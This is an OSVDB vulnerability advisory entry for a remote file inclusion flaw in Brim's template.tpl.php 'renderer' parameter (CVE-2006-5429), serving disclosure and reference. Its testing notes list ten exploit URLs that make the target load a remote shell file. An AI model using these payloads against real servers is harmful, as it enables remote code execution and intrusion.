Brim Multiple /templates/ Directory template.tpl.php renderer Variable Remote File Inclusion

2006-10-17T09:48:54
ID OSVDB:29764
Type osvdb
Reporter OSVDB
Modified 2006-10-17T09:48:54

Description

Manual Testing Notes

http://[target]/[path]/templates/barrel/template.tpl.php?renderer=http://shell.txt?
http://[target]/[path]/templates/sidebar/template.tpl.php?renderer=http://shell.txt?
http://[target]/[path]/templates/text-only/template.tpl.php?renderer=http://shell.txt?
http://[target]/[path]/templates/slashdot/template.tpl.php?renderer=http://shell.txt?
http://[target]/[path]/templates/penguin/template.tpl.php?renderer=http://shell.txt?
http://[target]/[path]/templates/pda/template.tpl.php?renderer=http://shell.txt?
http://[target]/[path]/templates/oerdec/template.tpl.php?renderer=http://shell.txt?
http://[target]/[path]/templates/nifty/template.tpl.php?renderer=http://shell.txt?
http://[target]/[path]/templates/mylook/template.tpl.php?renderer=http://shell.txt?
http://[target]/[path]/templates/barry/template.tpl.php?renderer=http://shell.txt?

References:

Vendor URL: http://sourceforge.net/projects/brim
Secunia Advisory ID: 22465
ISS X-Force ID: 29647
Generic Exploit URL: http://milw0rm.com/exploits/2589
FrSIRT Advisory: ADV-2006-4086
CVE-2006-5429
Bugtraq ID: 20594